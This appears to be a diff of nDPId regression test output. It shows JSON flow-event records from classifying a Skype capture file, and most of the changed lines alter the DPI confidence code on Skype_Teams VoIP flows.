+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1431970648367,"flow_last_seen":1431970708411,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":11890,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970697522,"flow_last_seen":1431970702574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.171","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970649777,"flow_last_seen":1431970674421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634591,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634589,"flow_last_seen":1431970661089,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 